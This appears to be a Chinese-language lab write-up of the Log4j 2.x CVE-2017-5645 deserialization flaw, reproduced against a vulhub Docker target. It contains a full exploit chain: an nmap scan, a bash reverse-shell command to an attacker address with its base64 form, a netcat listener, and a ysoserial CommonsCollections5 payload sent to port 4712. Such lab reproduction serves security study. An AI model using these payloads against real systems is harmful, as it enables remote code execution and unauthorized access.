Log4j CVE-2017-5645反序列化漏洞
Log4j CVE-2017-5645反序列化漏洞
原创 Hacker 0xh4ck3r 2025-02-01 00:30
Log4j CVE-2017-5645反序列化漏洞
影响范围
Apache Log4j 2.x <= 2.8.2
漏洞成因
Apache
Log4j
是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之 前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
漏洞利用
环境准备
|
|
---|---|
|
|
|
|
首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8983即可
cd vulhub-master/log4j/CVE-2017-5645
docker-compose up -d
然后进入攻击机里使用nmap扫描全端口:
nmap -sS 192.168.75.146 -p 1-65535 -v
image-20220725135637339
漏洞复现
首先准备好生成利用的工具:ysoserial.jar
工具验证漏洞是否存在
image-20220725142627138
image-20220725142656093
可以看出存在log4j漏洞
POC:
//反弹shell命令,注意替换为自己的
bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=
接下来新打开一个cmd窗口执行以下命令:
nc -lvvp 6666
监听启动后我们使用payload:
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" | nc 192.168.75.146 4712
访问上述地址后,可以看到如下图,反弹shell成功,此漏洞利用成功
image-20220725152235839